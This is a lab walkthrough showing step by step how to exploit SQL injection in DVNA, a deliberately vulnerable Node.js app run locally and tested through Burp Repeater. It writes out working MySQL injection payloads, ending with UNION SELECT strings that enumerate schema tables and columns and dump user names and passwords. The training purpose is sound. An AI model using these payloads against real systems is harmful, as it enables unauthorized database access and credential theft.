SQL Injection in DVNA
Last updated
Last updated
Step 1: Register a user on the application at http://localhost:9090/register and login to the application at http://localhost:9090/login
http://192.168.56.101:9090/login
Step 2: Click on Login under "A1: Injection" > "SQL Injection: User Search"
Step 3: On the "User Search" page, enter a string and click Enter. Capture the request that is made using Burp Intercept
Step 4: Send the intercepted request to Burp Repeater(CTRL+R) and navigate to repeater(CTRL+SHIFT+R)
Step 5: In the POST request in Repeater, modify the login parameter in POST body to a single quote(') and forward the request. Notice that the application generates an "Internal Error"
Step 6: In the POST request in Repeater, modify the login parameter in POST body to ' OR 1 -- // and forward the request. Notice that the application returns a user name and ID
Step 1: In the POST request in Repeater, modify the login parameter in POST body to 1' ORDER BY 3 -- // and forward the request. Notice that the application returns an internal error. Modify the parameter to 1' ORDER BY 2 -- // and notice the application doesn't generate an internal error
Step 2: In the POST request in Repeater, modify the login parameter in POST body to 1' UNION SELECT concat(database(),'%3b ',@@version,'%3b ',@@hostname),2 -- // and forward the request
Step 3: In the POST request in Repeater, modify the login parameter in POST body to 1' UNION SELECT 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema like 'dvna' -- // and forward the request
Step 4: In the POST request in Repeater, modify the login parameter in POST body to ' UNION SELECT 1,group_concat(DISTINCT column_name) from information_schema.columns where table_schema='dvna' -- // and forward the request
Step 5: In the POST request in Repeater, modify the login parameter in POST body to ' UNION SELECT group_concat(DISTINCT name,"%3b",password),1 from Users -- // and forward the request
